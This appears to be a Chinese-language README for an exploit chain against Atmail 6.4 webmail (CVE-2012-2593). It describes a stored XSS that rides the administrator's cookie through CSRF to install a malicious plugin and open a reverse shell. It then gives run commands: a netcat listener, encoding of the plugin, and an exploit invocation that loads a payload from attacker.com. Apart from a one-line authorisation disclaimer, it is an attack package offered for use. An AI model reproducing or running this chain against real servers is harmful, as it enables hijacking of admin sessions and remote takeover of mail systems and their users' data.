
Atmail XSS-CSRF-RCE 漏洞利用链
atmail-rce.py:利用 Atmail 网页邮件界面中的 CVE-2012-2593 漏洞。
atmail-csrf.js:利用 CVE-2012-2593 实现 CSRF 攻击的 JavaScript 文件,用于安装恶意插件并执行反向 Shell。
Plugin.php:待安装的 Atmail 插件,用于调用反向 Shell。
!!仅用于已获得测试权限的服务器
Atmail 邮件服务器 6.4 版本在邮件头的 Date 字段和邮件正文(通过 iFrame 注入)中存在 XSS 漏洞。利用此漏洞结合 JavaScript XHR API 发送带有管理员用户 cookie 的请求到管理后台,从而安装一个恶意插件并执行反向 Shell 代码,形成 CSRF 攻击。
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/